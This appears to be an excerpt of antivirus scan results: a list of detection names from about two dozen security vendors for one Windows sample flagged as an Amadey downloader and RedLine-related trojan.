DrWeb Trojan.MulDrop21.48586
TrendMicro TROJ_GEN.R002C0DCB23
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
Trapmine suspicious.low.ml.score
FireEye Generic.mg.5086db99de54fca2
Emsisoft Gen:Variant.Doina.45665 (B)
Ikarus Win32.Outbreak
Antiy-AVL Trojan[Downloader]/Win32.Amadey
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Amadey.CD!MTB
ViRobot Trojan.Win.Z.Doina.241152.C
GData Gen:Variant.Doina.45665
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5234847
Acronis suspicious
McAfee Artemis!5086DB99DE54
MAX malware (ai score=89)
Cylance unsafe
TrendMicro-HouseCall TrojanSpy.Win32.REDLINE.YXDCMZ
Rising Downloader.Amadey!8.125AC (TFE:5:HlAGNWrdXqP)
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Injector.EGTS!tr
BitDefenderTheta Gen:NN.ZexaF.36308.ouW@aaXKpqni
AVG Win32:Evo-gen [Trj]
Panda Trj/GdSda.A